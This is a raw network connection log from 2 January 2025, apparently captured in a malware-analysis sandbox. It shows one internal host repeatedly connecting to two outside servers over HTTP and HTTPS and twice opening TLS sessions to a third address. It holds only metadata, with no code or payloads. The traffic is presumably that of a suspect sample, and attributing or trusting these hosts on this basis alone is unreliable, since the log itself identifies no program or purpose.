Jan 2, 2025 16:05:32.615711927 CET	49744	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:32.617564917 CET	49744	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:32.617577076 CET	443	49744	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:32.617814064 CET	443	49744	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:32.660959005 CET	49744	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:32.707343102 CET	443	49744	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:32.783756971 CET	443	49744	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:32.783838987 CET	443	49744	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:32.783895016 CET	49744	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:32.786266088 CET	49744	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:32.792109013 CET	49740	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:32.796906948 CET	80	49740	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:33.138668060 CET	80	49743	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:33.141544104 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.141652107 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.141865969 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.142142057 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.142178059 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.193131924 CET	49743	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:33.758619070 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.760077953 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.760140896 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.965028048 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.965090990 CET	443	49745	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:33.965220928 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.967431068 CET	49745	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:33.971467972 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:33.977077961 CET	80	49746	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:33.977128983 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:33.977319002 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:33.982260942 CET	80	49746	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:36.021917105 CET	80	49740	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:36.043612957 CET	49740	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:36.049499989 CET	80	49740	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:36.458431959 CET	80	49746	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:36.459878922 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.459916115 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:36.459990025 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.460197926 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.460211992 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:36.505671024 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:36.949445009 CET	80	49740	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:36.951761007 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.951798916 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:36.951858997 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.952110052 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.952125072 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:36.990025043 CET	49740	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:36.991883993 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:36.993482113 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:36.993505955 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.149938107 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.150000095 CET	443	49747	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.150074005 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:37.150464058 CET	49747	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:37.153646946 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.154716015 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.159732103 CET	80	49746	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:37.159836054 CET	49746	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.160085917 CET	80	49749	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:37.160156012 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.160213947 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.164958954 CET	80	49749	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:37.426803112 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.429696083 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:37.429725885 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.602646112 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.602703094 CET	443	49748	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:37.602754116 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:37.603441000 CET	49748	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:37.631056070 CET	49740	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.636423111 CET	80	49740	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:37.636497021 CET	49740	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.668972969 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.673816919 CET	80	49750	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:37.673877001 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.676503897 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:37.681329012 CET	80	49750	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:38.365104914 CET	80	49749	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:38.366818905 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.366854906 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.366919994 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.367129087 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.367141962 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.411920071 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:38.915652037 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.917285919 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.917315960 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.948564053 CET	80	49750	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:38.949738026 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.949780941 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.949855089 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.950086117 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:38.950099945 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:38.990029097 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.157186985 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.157262087 CET	443	49751	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.157444954 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.157743931 CET	49751	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.160722971 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.161802053 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.165868044 CET	80	49749	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.165949106 CET	49749	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.167062998 CET	80	49753	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.167135954 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.167212963 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.171981096 CET	80	49753	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.621822119 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.623343945 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.623377085 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.633395910 CET	80	49753	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.634618044 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.634649038 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.634732962 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.635026932 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.635039091 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.677572966 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.776638985 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.776699066 CET	443	49752	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:39.776757002 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.777179003 CET	49752	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:39.780411959 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.781516075 CET	49755	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.785444021 CET	80	49750	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.785518885 CET	49750	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.786329985 CET	80	49755	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:39.786418915 CET	49755	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.786648989 CET	49755	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:39.791409016 CET	80	49755	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.097131968 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.099873066 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.099905014 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.253823996 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.253895044 CET	443	49754	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.253951073 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.254460096 CET	49754	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.258666039 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.259419918 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.263672113 CET	80	49753	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.263724089 CET	49753	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.264219046 CET	80	49756	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.264290094 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.264377117 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.269186974 CET	80	49756	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.720549107 CET	80	49756	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.721898079 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.721939087 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.722006083 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.722238064 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.722254992 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.771264076 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:40.994121075 CET	80	49755	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:40.995377064 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.995423079 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:40.995507002 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.995769978 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:40.995783091 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.036998034 CET	49755	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.392543077 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.394241095 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.394263983 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.548564911 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.548619032 CET	443	49757	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.548784018 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.549156904 CET	49757	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.552330971 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.553396940 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.557446957 CET	80	49756	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:41.557522058 CET	49756	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.558216095 CET	80	49759	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:41.558300972 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.558399916 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.563148975 CET	80	49759	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:41.566709995 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.568306923 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.568325043 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.816869020 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.816931009 CET	443	49758	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:41.817255974 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.817416906 CET	49758	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:41.821940899 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.826802969 CET	80	49760	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:41.826900959 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.826998949 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:41.831698895 CET	80	49760	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:42.905512094 CET	80	49759	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:42.906918049 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:42.906958103 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:42.907159090 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:42.907277107 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:42.907284021 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:42.958863020 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.373022079 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:43.374639034 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:43.374670982 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:43.529825926 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:43.529877901 CET	443	49761	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:43.530026913 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:43.530288935 CET	49761	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:43.533093929 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.534107924 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.538017988 CET	80	49759	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:43.538083076 CET	49759	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.538870096 CET	80	49762	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:43.538938046 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.539006948 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:43.543732882 CET	80	49762	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:44.826647043 CET	80	49762	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:44.827852011 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:44.827893019 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:44.827963114 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:44.828195095 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:44.828207970 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:44.880686998 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.110498905 CET	80	49760	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:45.111749887 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.111804008 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.111882925 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.112138033 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.112155914 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.161909103 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.291943073 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.293546915 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.293569088 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.465284109 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.465327978 CET	443	49763	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.465399981 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.465792894 CET	49763	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.505567074 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.510623932 CET	80	49762	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:45.510668039 CET	49762	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.513365030 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:45.513395071 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:45.513449907 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:45.513792992 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:45.513804913 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:45.575695038 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.577095985 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.577126980 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.713284016 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.713329077 CET	443	49764	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:45.713419914 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.713664055 CET	49764	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:45.716401100 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.717261076 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.721323967 CET	80	49760	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:45.721388102 CET	49760	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.722064018 CET	80	49766	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:45.722126007 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.722193003 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:45.726926088 CET	80	49766	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:46.125576973 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.125785112 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:46.127404928 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:46.127413034 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.127613068 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.128942013 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:46.175343037 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.207492113 CET	80	49766	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:46.208441973 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.208462000 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.208522081 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.208733082 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.208744049 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.255681038 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.371984005 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.372037888 CET	443	49765	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:46.372194052 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:46.424344063 CET	49765	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:46.663480997 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.692720890 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.692735910 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.962737083 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.962790012 CET	443	49767	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:46.962842941 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.963306904 CET	49767	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:46.967204094 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.968288898 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.972141981 CET	80	49766	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:46.972189903 CET	49766	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.973105907 CET	80	49768	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:46.973171949 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.973227024 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:46.978014946 CET	80	49768	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:47.776566029 CET	80	49768	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:47.777909040 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:47.777971983 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:47.778057098 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:47.778325081 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:47.778347015 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:47.818186998 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.279392958 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:48.281630039 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:48.281666040 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:48.415193081 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:48.415241957 CET	443	49769	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:48.415326118 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:48.415687084 CET	49769	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:48.418606997 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.419583082 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.423574924 CET	80	49768	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:48.424252033 CET	49768	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.424439907 CET	80	49770	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:48.424495935 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.424592018 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:48.429358006 CET	80	49770	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:51.029989004 CET	80	49770	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:51.033416986 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.033535957 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.033612967 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.034017086 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.034051895 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.083821058 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:51.488970041 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.490704060 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.490776062 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.635354042 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.635426998 CET	443	49771	188.114.97.3	192.168.2.4
Jan 2, 2025 16:05:51.635485888 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.635951042 CET	49771	443	192.168.2.4	188.114.97.3
Jan 2, 2025 16:05:51.650685072 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:51.651357889 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:51.651397943 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:51.651473045 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:51.651853085 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:51.651863098 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:51.655690908 CET	80	49770	193.122.130.0	192.168.2.4
Jan 2, 2025 16:05:51.655741930 CET	49770	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:52.277256012 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.277331114 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:52.278789997 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:52.278800011 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.279030085 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.280353069 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:52.327328920 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.467556953 CET	49743	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:52.527390957 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.527466059 CET	443	49772	149.154.167.220	192.168.2.4
Jan 2, 2025 16:05:52.527648926 CET	49772	443	192.168.2.4	149.154.167.220
Jan 2, 2025 16:05:52.527970076 CET	49772	443	192.168.2.4	149.154.167.220
